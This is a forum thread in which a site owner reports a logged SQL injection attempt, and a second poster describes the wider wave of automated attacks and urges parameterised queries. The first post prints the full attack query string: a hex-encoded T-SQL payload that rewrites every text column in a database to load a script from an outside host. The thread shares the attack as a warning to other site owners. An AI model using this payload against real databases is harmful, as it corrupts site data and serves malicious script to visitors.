SQL Injection Attacks

Hello,

I was attacked between 8:30AM and 8:54AM EST this morning by the following IPs:

220.232.191.66
165.21.155.10
165.21.155.16
119.234.1.28

The following is the SQL that was attempted:

Code:
Query String: ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F64756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

I have a rather complex system set up for catching malicious query strings in the URL. Currently none of my sites have active databases so I am in no real danger. I just wanted to let the community know that this is happening. The specific site that was attacked has VERY low traffic so I was shocked that it was done at all.

The code itself is harmless, I believe. It points to a site that formerly contained some nasty JavaScript, but it has been modified to point to nothing now. However, this doesn't mean that the next attack will be harmless.

Param those queries!

later,
-junc
 
You are exactly right. There are thousands (literally) of what seem to be zombie-injected computers being used as someone's own "JavaScript infecting" spider. Pages being hit are large and small, and from the logs I see they don't come from Google but directly in; it also doesn't seem to be scanning IP ranges like attacks/scans of old, but coming direct to URLs and starting to put code in every textbox on every page it finds.

It has recently been modified such that it will infect ColdFusion databases in the same manner :(

Looking at the hits as you mention and how they come, and how I've seen literally dozens of times now, the IPs are many and they come too quickly to be totally non-directed spidering of the web. One is China and the others Singapore, but I have seen quite a few from Korea and Germany, a few from the UK and US, and some from the planet :(
 